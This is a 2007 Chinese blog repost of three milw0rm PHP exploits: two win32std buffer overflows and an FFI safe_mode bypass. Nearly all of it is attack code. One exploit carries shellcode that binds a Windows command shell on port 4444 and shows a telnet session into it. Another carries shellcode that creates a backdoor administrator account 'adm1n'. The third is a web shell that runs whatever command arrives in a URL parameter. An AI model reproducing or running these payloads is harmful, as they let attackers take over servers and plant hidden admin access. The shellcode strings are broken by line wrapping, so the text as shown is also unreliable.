PHP <= 5.2.3 Local Buffer Overflow Exploit

灰鸽子篇之DLL释放型后门的特征码修改

茶花村现状:请公仆们看看什么叫真正的赤贫

大 | 中 | 小

09:37,28,Aug,2007 | (1285/0/0) | milw0rm

PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit(1)

<?php
/*
Inphex
317 Bytes , Windows Command Shell  Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.
GET /script.php HTTP/1.1\n

telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\apache>
7ffdf020  7c911005 7c9110ed 00000001 00000000

shoutz go to Kevin Finisterre
*/

if(!function_exists('win_browse_file')) {
die('win32std extension is not available');
}
$shellcode=
"\x2b\xc9\xb1\x51\xba\xbb\xb2\xd5\x31\xda\xda\xd

9\x74\x24\xf4".
"\x58\x31\x50\x0e\x83\xc0\x04\x03\xeb\xb8\x37\xc

4\xf7\xd7\x5c".
"\x6a\xef\xd1\x5c\x8a\x10\x41\x28\x19\xca\xa6\xa

5\xa7\x2e\x2c".
"\xc5\x22\x36\x33\xd9\xa6\x89\x2b\xae\xe6\x35\x4

d\x5b\x51\xbe".
"\x79\x10\x63\x2e\xb0\xe6\xfd\x02\x37\x26\x89\x5

d\xf9\x6d\x7f".
"\x60\x3b\x9a\x74\x59\xef\x79\x5d\xe8\xea\x09\xc

2\x36\xf4\xe6".
"\x9b\xbd\xfa\xb3\xe8\x9e\x1e\x45\x04\x23\x33\xc

e\x53\x4f\x6f".
"\xcc\x02\x4c\x5e\x37\xa0\xd9\xe2\xf7\xa2\x9d\xe

8\x7c\xc4\x01".
"\x5c\x09\x65\x31\xc0\x66\xe8\x0f\xf2\x9a\xa4\x7

0\xdc\x05\x16".
"\xe8\x89\xfa\xaa\x9c\x3e\x8e\xf8\x03\x95\x8f\x2

d\xd3\xde\x9d".
"\x32\x18\xb1\xa2\x1d\x01\xb8\xb8\xc4\x3c\x57\x4

a\x0b\x6b\xc2".
"\x49\xf4\x43\x7a\x97\x03\x96\xd6\x70\xeb\x8e\x7

a\x2c\x40\x7d".
"\x2e\x91\x35\xc2\x83\xea\x6a\xa2\x4b\x04\xd7\x4

c\xdf\xaf\x06".
"\x05\xb7\x0b\xd2\x55\x8f\x03\x1c\x43\x65\xbc\xb

3\x3e\x85\x6c".
"\x5b\x64\xd4\xa3\x75\x33\xd8\x6a\xd6\xee\xd9\x4

3\xb1\xf5\x6f".
"\xe2\x0b\xa2\x90\x3c\xdb\x18\x3b\x94\x23\x70\x5

0\x7e\x3b\x09".
"\x91\x06\x94\x16\xcb\xac\xe5\x38\x92\x24\x7e\xd

e\x33\xda\x13".
"\x97\x21\x76\xbc\xfe\x80\x4b\xb5\xe7\xb9\x17\x4

f\x05\x0c\x58".
"\xbc\x63\x91\x1a\x6e\x8d\x2c\xb7\xe3\xfc\xcb\xf

f\xa8\x55\x80".
"\x68\xdd\x57\x64\x7e\xde\xd2\xcf\x80\xf6\x47\x8

7\x2c\xa6\x26".
"\x76\xbb\x49\x99\x29\x6e\x1b\xe6\x1a\xf8\x36\xc

1\x9e\x37\x1b".
"\x0e\x76\xad\x63\x0f\x40\xcd\x4c\x64\xf8\xcd\xe

e\xbe\x63\xd1".
"\x27\x6c\x93\xfd\xa0\x60\xe1\xfa\x6f\xd3\x09\xd

4\x6f\x03\xf5".
"\xd9\x8f";

$eip = "\xDC\x1C\x9C\x7C"; //shell32.dll
win_browse_file( 1, NULL, str_repeat( "A", 260

)."".$eip."XXXX\x20\xf0\xfd\x7f".str_repeat("C",500).$shellcode.str_repeat

("C",300), NULL, array( "*" => "*.*" ) );
?>

PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit (2)

<?php

##########################################################
###----------------------------------------------------###
###--------PHP win32std Buffer Overflow Exploit--------###
###----------------------------------------------------###
###-Tested on:-PHP 5.2.3-------------------------------###
###------------Windows XP SP2 Eng----------------------###
###----------------------------------------------------###
###-Note:-Shellcode is hard coded for Win XP SP2 Eng---###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################

#Add user:    [user]=>"adm1n" [password]=>"netjackal"
$SC=
"\xEB\x19\x5A\x31\xC0\x50\x88\x42\x52\x52\xBB\x6

D\x13\x86".
"\x7C\xFF\xD3\xBB\xDA\xCD\x81\x7C\x31\xC0\x50\xF

F\xD3\xE8".
"\xE2\xFF\xFF\xFF\x63\x6D\x64\x2E\x65\x78\x65\x2

0\x2F\x63".
"\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x61\x6

4\x6D\x31".
"\x6E\x20\x6E\x65\x74\x6A\x61\x63\x6B\x61\x6C\x2

0\x2F\x61".
"\x64\x64\x26\x26\x6E\x65\x74\x20\x6C\x6F\x63\x6

1\x6C\x67".
"\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x7

3\x74\x72".
"\x61\x74\x6F\x72\x73\x20\x2F\x61\x64\x64\x20\x6

1\x64\x6D".
"\x31\x6E\x58";

$RET="\x70\xE6\x16\x01";

$BOMB=str_repeat("\x90",24).$SC.str_repeat("A",121).$RET;

win_browse_file(1,NULL,$BOMB,NULL,array( "*" => "*.*"));
?>

PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit

<?php

##########################################################
###----------------------------------------------------###
###-----PHP FFI Extension Safe_mode Bypass Exploit-----###
###----------------------------------------------------###
###-Tested on 5.0.5------------------------------------###
###----------------------------------------------------###
###-Usage:-http://victim.net/NJ.php?cmd=[COMMAND]------###
###----------------------------------------------------###
###-PHP:-http://php.net--------------------------------###
###-FFI:-http://pecl.php.net/package/ffi---------------###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################

if(!extension_loaded('ffi'))
die('ERROR: FFI extension is not loaded!');
$command=(empty($_GET['cmd']))?'dir':$_GET['cmd'];
if(is_writeable(dirname(__FILE__)))$tmp=dirname(__FILE__);
elseif(is_writeable(ini_get('session.save_path')))
$tmp=ini_get('session.save_path');
elseif(is_writeable(ini_get('upload_tmp_dir')))
$tmp=ini_get('upload_tmp_dir');
else die('ERROR: Move exploit to writeable folder.');
$output="$tmp\\".uniqid('NJ');
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res=$api->WinExec("cmd.exe /c $command >\"$output\"",0);
while(!file_exists($output))sleep(1);
$con='';
$fp=fopen($output,'r');
while(!feof($fp))$con.=fgets($fp,1024);
fclose($fp);
$con=htmlspecialchars($con);
echo "<pre>$con</pre>";
unlink($output);
?>

最后编辑： chen 编辑于2007/08/28 22:50

灰鸽子篇之DLL释放型后门的特征码修改

茶花村现状:请公仆们看看什么叫真正的赤贫

< 2012 > < 2 > 壬辰年（龙）
日	一	二	三	四	五	六
			1 初十	2 十一	3 十二	4 十三
5 十四	6 十五	7 十六	8 十七	9 十八	10 十九	11 二十
12 廿一	13 廿二	14 廿三	15 廿四	16 廿五	17 廿六	18 廿七
19 廿八	20 廿九	21 三十	22 二月	23 初二	24 初三	25 初四
26 初五	27 初六	28 初七	29 初八

Chen's blog

PHP <= 5.2.3 Local Buffer Overflow Exploit

分类

公告

日历

搜索

最新日志

随机日志

最新评论

评论排行

最新留言

链接

归档

其他

统计